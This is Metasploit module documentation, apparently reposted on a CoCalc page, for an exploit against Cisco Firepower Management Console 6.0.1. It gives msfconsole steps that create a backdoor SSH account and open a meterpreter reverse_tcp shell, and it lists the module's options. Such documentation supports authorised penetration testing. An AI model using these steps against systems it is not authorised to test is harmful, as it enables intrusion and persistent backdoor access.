CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

This module exploits a vulnerability in Cisco Firepower Management Console RCE. It will create a backdoor SSH account via HTTPS, and then obtain a native payload session in SSH.

Vulnerable Application

This exploit was specifically written against 6.0.1 (build 1213). To test, you can find the virtual appliance here:

https://software.cisco.com/download/release.html?mdfid=286259687&softwareid=286271056&release=6.0.1&flowid=54052

Verification Steps

1. Start msfconsole

2. use exploit/linux/http/cisco_firepower_useradd

3. set password [https console password for admin]

4. set rhost [IP]

5. set payload linux/x86/meterpreter/reverse_tcp

6. set lhost [IP]

7. exploit

8. You should get a session

Options

USERNAME The username for Cisco Firepower Management console.

PASSWORD The password for Cisco Firepower Management console.

NEWSSHUSER The SSH account to create. By default, this is random.

NEWSSHPASS The SSH password for the new account. By default, this is also random.

SSHPORT In case for some reason, the SSH changed, otherwise this is 22 by default.